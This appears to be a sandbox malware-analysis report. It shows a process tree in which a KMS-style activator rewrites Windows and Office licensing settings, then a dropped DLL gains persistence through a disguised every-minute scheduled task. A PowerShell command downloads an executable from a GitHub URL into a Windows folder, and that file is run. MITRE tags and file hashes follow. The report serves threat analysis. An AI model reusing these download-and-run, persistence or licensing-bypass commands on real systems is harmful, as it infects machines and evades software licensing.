C:\Windows\system32\findstr.exefindstr /I /C:"MondoVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5636
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"StandardVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5768
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ExcelVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:3316
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OutlookVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5772
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PowerPointVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:6092
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"PublisherVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:4648
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"WordVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:6004
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"AccessVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5900
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"SkypeforBusinessVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5908
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectProVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5948
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"ProjectStdVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5816
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioProVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5916
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"VisioStdVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5932
-
-
C:\Windows\system32\findstr.exefindstr /I /C:"OneNoteVolume" "C:\Windows\Temp\crvProductIds.txt"3⤵PID:5856
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\A9C88E0B-9DC8-47AB-AB89-9AE025316701\ProPlusRetail.163⤵
- Modifies registry key
PID:5812
-
-
C:\Windows\system32\find.exefind /i "Office16ProPlusVL_KMS_Client" "C:\Windows\Temp\crvVolume.txt"3⤵PID:5984
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\A9C88E0B-9DC8-47AB-AB89-9AE025316701\ProPlusVolume.163⤵
- Modifies registry key
PID:6016
-
-
C:\Windows\system32\find.exefind /i "Office16MondoVL_KMS_Client" "C:\Windows\Temp\crvVolume.txt"3⤵PID:6124
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-bridge-office.xrm-ms"3⤵PID:5760
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root-bridge-test.xrm-ms"3⤵PID:6008
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-root.xrm-ms"3⤵PID:6020
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-stil.xrm-ms"3⤵PID:5140
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-ul-oob.xrm-ms"3⤵PID:5172
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\client-issuance-ul.xrm-ms"3⤵PID:6136
-
-
C:\Windows\system32\cscript.execscript.exe //NoLogo //B C:\Windows\Sysnative\slmgr.vbs /ilc "C:\Program Files\Microsoft Office\root\Licenses16\pkeyconfig-office.xrm-ms"3⤵PID:5176
-
-
C:\Windows\system32\reg.exereg delete HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /f /v ProPlus2019Volume.OSPPReady3⤵
- Modifies registry key
PID:312
-
-
C:\Program Files\Microsoft Office\root\integration\Integrator.exe"C:\Program Files\Microsoft Office\root\integration\integrator.exe" /I /License PRIDName=ProPlus2019Volume.16 PackageGUID="9AC08E99-230B-47e8-9721-4577B7F124EA" PackageRoot="C:\Program Files\Microsoft Office\root"3⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:396
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663'" get LicenseFamily3⤵PID:2256
-
-
C:\Windows\system32\find.exefind /i "ProPlus2019VL_"3⤵PID:5036
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /f /v ProPlus2019Volume.OSPPReady /t REG_SZ /d 13⤵
- Modifies registry key
PID:1852
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:5520
-
-
C:\Windows\system32\findstr.exefindstr /I "ProPlus2019Volume"3⤵PID:5540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- System Location Discovery: System Language Discovery
PID:4304 -
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds4⤵
- Modifies registry key
PID:5076
-
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds /t REG_SZ /d "ProPlusRetail,ProPlus2019Volume" /f3⤵
- Modifies registry key
PID:1344
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:4568
-
-
C:\Windows\system32\findstr.exefindstr 20193⤵PID:3476
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:8
-
-
C:\Windows\system32\findstr.exefindstr 20213⤵PID:4452
-
-
C:\Windows\system32\reg.exereg query HKLM\SOFTWARE\Microsoft\Office\ClickToRun\Configuration /v ProductReleaseIds3⤵
- Modifies registry key
PID:5312
-
-
C:\Windows\system32\findstr.exefindstr 20243⤵PID:2812
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingService where Version='10.0.19041.1266' call RefreshLicenseStatus3⤵PID:2464
-
-
C:\Windows\system32\reg.exereg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msoxmled.exe"3⤵PID:5416
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "Description like '%KMSCLIENT%' AND NOT Name like '%MondoR_KMS_Automation%'" get Name /value3⤵PID:5476
-
-
C:\Windows\system32\find.exefind /i "Office 16" "C:\Windows\Temp\sppchk.txt"3⤵PID:5464
-
-
C:\Windows\system32\find.exefind /i "Office 19" "C:\Windows\Temp\sppchk.txt"3⤵PID:1952
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND NOT Name like '%O365%'" get Name /value3⤵PID:5592
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5556
-
-
C:\Windows\system32\find.exefind /i "Office 14"3⤵PID:5596
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5664
-
-
C:\Windows\system32\find.exefind /i "Office 15"3⤵PID:5576
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5660
-
-
C:\Windows\system32\find.exefind /i "Office 16"3⤵PID:5748
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5180
-
-
C:\Windows\system32\find.exefind /i "Office 19"3⤵PID:5108
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:4664
-
-
C:\Windows\system32\find.exefind /i "Office 21"3⤵PID:4712
-
-
C:\Windows\system32\find.exefind /i "R_Retail" "C:\Windows\Temp\sppchk.txt"3⤵PID:5128
-
-
C:\Windows\system32\find.exefind /i "Office 24"3⤵PID:5184
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' AND LicenseFamily like 'Office16O365%'" get LicenseFamily /value3⤵PID:2756
-
-
C:\Windows\system32\find.exefind /i "O365"3⤵PID:4508
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "Description like '%KMSCLIENT%'" get Name /value3⤵PID:5700
-
-
C:\Windows\system32\findstr.exefindstr /i Windows3⤵PID:5676
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL" get Name /value3⤵PID:5364
-
-
C:\Windows\system32\findstr.exefindstr /i Windows3⤵PID:5404
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL" get GracePeriodRemaining /value 2>nul3⤵
- System Location Discovery: System Language Discovery
PID:3740 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' and PartialProductKey is not NULL" get GracePeriodRemaining /value4⤵PID:5532
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingService get Version /value3⤵
- System Location Discovery: System Language Discovery
PID:5668 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingService get Version /value4⤵PID:5880
-
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2"3⤵PID:6140
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /t REG_SZ /d "1688"3⤵PID:2792
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2" /reg:323⤵PID:6032
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /f /v KeyManagementServicePort /t REG_SZ /d "1688" /reg:323⤵PID:5936
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /reg:323⤵PID:5892
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2" /reg:323⤵PID:5828
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServicePort /t REG_SZ /d "1688" /reg:323⤵PID:5840
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f3⤵PID:5868
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServiceName /t REG_SZ /d "172.16.0.2"3⤵PID:5816
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663" /f /v KeyManagementServicePort /t REG_SZ /d "1688"3⤵PID:5920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' " get ID /value3⤵
- System Location Discovery: System Language Discovery
PID:5792 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='55c92734-d682-4d71-983e-d6ec3f16059f' and Description like '%KMSCLIENT%' " get ID /value4⤵PID:5832
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get LicenseStatus /value3⤵PID:5960
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:6104
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:5156
-
-
C:\Windows\system32\findstr.exefindstr /i "2de67392-b7a7-462a-b1ca-108dd189f588"3⤵PID:5740
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\55c92734-d682-4d71-983e-d6ec3f16059f\2de67392-b7a7-462a-b1ca-108dd189f588" /f3⤵PID:5976
-
-
C:\Windows\system32\reg.exereg delete "HKU\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /f3⤵
- Modifies data under HKEY_USERS
PID:6040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get Name /value3⤵
- System Location Discovery: System Language Discovery
PID:6060 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get Name /value4⤵PID:5172
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where ID='2de67392-b7a7-462a-b1ca-108dd189f588' call Activate3⤵PID:5212
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get GracePeriodRemaining /value3⤵
- System Location Discovery: System Language Discovery
PID:3716 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='2de67392-b7a7-462a-b1ca-108dd189f588'" get GracePeriodRemaining /value4⤵PID:5148
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='3f1afc82-f8ac-4f6c-8005-1d233e606eee'" get LicenseStatus /value3⤵PID:4044
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:3156
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:5276
-
-
C:\Windows\system32\findstr.exefindstr /i "3f1afc82-f8ac-4f6c-8005-1d233e606eee"3⤵PID:5304
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='73111121-5638-40f6-bc11-f1d7b0d64300'" get LicenseStatus /value3⤵PID:5260
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:5560
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:5620
-
-
C:\Windows\system32\findstr.exefindstr /i "73111121-5638-40f6-bc11-f1d7b0d64300"3⤵PID:1728
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='82bbc092-bc50-4e16-8e18-b74fc486aec3'" get LicenseStatus /value3⤵PID:1344
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:876
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:5308
-
-
C:\Windows\system32\findstr.exefindstr /i "82bbc092-bc50-4e16-8e18-b74fc486aec3"3⤵PID:8
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='e0c42288-980c-4788-a014-c080d2e1926e'" get LicenseStatus /value3⤵PID:5064
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:5492
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:4808
-
-
C:\Windows\system32\findstr.exefindstr /i "e0c42288-980c-4788-a014-c080d2e1926e"3⤵PID:2464
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='e4db50ea-bda1-4566-b047-0ca50abc6f07'" get LicenseStatus /value3⤵PID:5484
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:5476
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:5552
-
-
C:\Windows\system32\findstr.exefindstr /i "e4db50ea-bda1-4566-b047-0ca50abc6f07"3⤵PID:5580
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='ec868e65-fadf-4759-b23e-93fe37f2cc29'" get LicenseStatus /value3⤵PID:5588
-
-
C:\Windows\system32\findstr.exefindstr "1"3⤵PID:5600
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:3128
-
-
C:\Windows\system32\findstr.exefindstr /i "ec868e65-fadf-4759-b23e-93fe37f2cc29"3⤵PID:5188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' and Description like '%KMSCLIENT%'" get ID /value3⤵
- System Location Discovery: System Language Discovery
PID:5128 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ApplicationID='0ff1ce15-a989-479d-af46-f275c6370663' and Description like '%KMSCLIENT%'" get ID /value4⤵PID:1000
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='0bc88885-718c-491d-921f-6f214349e79c'" get Name /value3⤵PID:5688
-
-
C:\Windows\system32\find.exefind /i "Office 14" "C:\Windows\Temp\sppchk.txt"3⤵PID:920
-
-
C:\Windows\system32\find.exefind /i "Office 15" "C:\Windows\Temp\sppchk.txt"3⤵PID:1068
-
-
C:\Windows\system32\find.exefind /i "Office 16" "C:\Windows\Temp\sppchk.txt"3⤵PID:4040
-
-
C:\Windows\system32\find.exefind /i "Office 19" "C:\Windows\Temp\sppchk.txt"3⤵PID:3048
-
-
C:\Windows\system32\find.exefind /i "Office 21" "C:\Windows\Temp\sppchk.txt"3⤵PID:5428
-
-
C:\Windows\system32\find.exefind /i "Office 24" "C:\Windows\Temp\sppchk.txt"3⤵PID:4072
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ID='0bc88885-718c-491d-921f-6f214349e79c'" get Name /value3⤵
- System Location Discovery: System Language Discovery
PID:4564 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='0bc88885-718c-491d-921f-6f214349e79c'" get Name /value4⤵PID:5756
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:5872
-
-
C:\Windows\system32\findstr.exefindstr /i "0bc88885-718c-491d-921f-6f214349e79c"3⤵PID:5636
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03'" get Name /value3⤵PID:5912
-
-
C:\Windows\system32\find.exefind /i "Office 14" "C:\Windows\Temp\sppchk.txt"3⤵PID:5844
-
-
C:\Windows\system32\find.exefind /i "Office 15" "C:\Windows\Temp\sppchk.txt"3⤵PID:5908
-
-
C:\Windows\system32\find.exefind /i "Office 16" "C:\Windows\Temp\sppchk.txt"3⤵PID:5796
-
-
C:\Windows\system32\find.exefind /i "Office 19" "C:\Windows\Temp\sppchk.txt"3⤵PID:5868
-
-
C:\Windows\system32\find.exefind /i "Office 21" "C:\Windows\Temp\sppchk.txt"3⤵PID:5916
-
-
C:\Windows\system32\find.exefind /i "Office 24" "C:\Windows\Temp\sppchk.txt"3⤵PID:6084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03'" get Name /value3⤵
- System Location Discovery: System Language Discovery
PID:6100 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03'" get Name /value4⤵PID:5832
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "PartialProductKey is not NULL" get ID /value3⤵PID:5928
-
-
C:\Windows\system32\findstr.exefindstr /i "85dd8b5f-eaa4-4af3-a628-cce9e77c9a03"3⤵PID:6112
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\0ff1ce15-a989-479d-af46-f275c6370663\85dd8b5f-eaa4-4af3-a628-cce9e77c9a03" /f3⤵PID:6068
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Office\16.0\Common\OEM" /f3⤵PID:5156
-
-
C:\Windows\system32\reg.exereg delete "HKLM\SOFTWARE\Microsoft\Office\16.0\Common\OEM" /f /reg:323⤵PID:5196
-
-
C:\Windows\system32\reg.exereg delete "HKU\S-1-5-20\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform\PersistedSystemState" /f3⤵PID:6036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03'" get Name /value3⤵
- System Location Discovery: System Language Discovery
PID:6040 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03'" get Name /value4⤵PID:5144
-
-
-
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03' call Activate3⤵PID:6060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic path SoftwareLicensingProduct where "ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03'" get GracePeriodRemaining /value3⤵
- System Location Discovery: System Language Discovery
PID:5212 -
C:\Windows\system32\Wbem\WMIC.exewmic path SoftwareLicensingProduct where "ID='85dd8b5f-eaa4-4af3-a628-cce9e77c9a03'" get GracePeriodRemaining /value4⤵PID:1940
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\System32\vcruntime143_thread.dll,Start1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in Windows directory
PID:6004 -
C:\Windows\system32\schtasks.exeschtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachineCoreUO" /tr "rundll32.exe C:\Windows\System32\vcruntime143_thread.dll,Start"2⤵
- Scheduled Task/Job: Scheduled Task
PID:5168
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\temp_script.bat2⤵PID:2888
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/zoneprohuub/WOC/main/VAN' -OutFile 'C:\Windows\Help\service\wininitt.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:4276
-
-
-
C:\Windows\Help\service\wininitt.exeC:\Windows\Help\service\wininitt.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5684
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
2Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419
Filesize471B
MD50810ce4a9d0ed56c3c026a3fe00db494
SHA1decc798e3724bac2787729228876d271e6ea436f
SHA256444b65a82933350c6ff041c5cc2de824befd1a46df3aee1d9e89a4b359472fe3
SHA5129333e484ffa20f5d77944f9b549c12fa3e4593182e78265f496b28f991bff98f5408eccf157047a6ba639bbc9b1c63a15d7668fc38df06166cafc71afc28bd7e
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_49536AB5156BDD74EFF881D01C36A419
Filesize412B
MD584559d6ededf5d781e21bd6f9cd2da5b
SHA19c76046c712655fad51917facb9ae2f14a54bccd
SHA25635b3423eea8b9e194c6213eeb418e425d95035f182ba17fd3028ae9f9e83f58e
SHA512ed86f076798745043f697e862d2e7cbf59b841e58a313c06100fac616fb8d86d034df798991130dd455fba1385cfdce051af86b5e808bfc4e4cedb8166550be5
-
Filesize
649B
MD5d374a95ea61675d5f06119600aa747ad
SHA1c2f4592dc9c5538ba340796c8630ea33e5b9c2f5
SHA2561d136d2120ee60f37684cb0f69fd4d0964642832cb73864aa5f3f6e86d7ba448
SHA512fcb10c85559d4f54c2cc3eb86ca1da45fbcea2c382be85c04f0c0b5e754ab5051a6ad8516a4924899ad7db3bbe854e2988fa10dccc449e2e76a6fe57386bd52b
-
Filesize
2KB
MD57272aa50f258c28c373166deda74eff6
SHA158f6b0c4e1823bd49e3e19f0cc02e40337220cad
SHA256f641d6d5c32978e72a5d3655c01ba682a9edcc9cce377b1467f54aea7a6d1a86
SHA512b25b4e627155b947c1da8e2089ecedc029ae29be43b7177decfac537913139bc938a150a46a7ad0a40fe27dc95277641c98653e406aae597fb32b30d8a644df7
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
9KB
MD5644b65336287de3701b49dceae16ae1f
SHA1d42a97eee19b42457aa391c2d0b00f7a205e6804
SHA256231c441e285139d0262416394018363cd4bd42eeb33f6067d2521e06b167d076
SHA5125ed47348f299a991744c32bad316b7ab1e961397843b89b988c80d244f4176a5c36ef022576e6504f29a9a6cb09e224867bc7fa32c07065e40c21176e161e468
-
Filesize
9KB
MD5d89f96864dfa1f8a9011eb7af60510fc
SHA12bcb8e670ac83513d493bba5cd3315e99945185a
SHA256717a7473bfa8d84eec599d93c2e932204b5a76eeaf836ba2969e6da1fea06b8d
SHA5123bbcc53b955911bd1231bc1147920ab665599a441518a6ffa854918bf2579e7fd211fb4b00ca8a5006ed07ac6e1aa027130239b32e9ea5463fb4702eea77af23
-
Filesize
9KB
MD5d365ff6f0e93d2a63761fdf0475c602b
SHA114ad5f560c776e74fb926a2f6a0c519c62809aa3
SHA2563f4571dec9395c1e0d2510c7b75929d11ab6e04e054a6fc55ebbc7caca11f36d
SHA512ddb2a5d5cff3f05c432924b94a7beead845f76307fc6bd33ee09696ab4bd4085f30c5c8cdd74c37ef3bf7fed4c78a897d750a6f794e1c5395ebf612351e6f41b
-
Filesize
9KB
MD5517843b31386158414771893f1b77d90
SHA145b31fe54c8e68317879fbc9ce7a3e167a790830
SHA25600c7aa9d7000deeb4f71189f91442987da05d0ab367db4da8d86aac39e74b632
SHA51207f9ee6422dc0f29f0dd7f77004c53c57f5b41833c74f0aed956aaf2a02e92b7617de5a324e478da53f805ff41bbc901a82a051b9615d5961e4b1bcbaa598971
-
Filesize
116KB
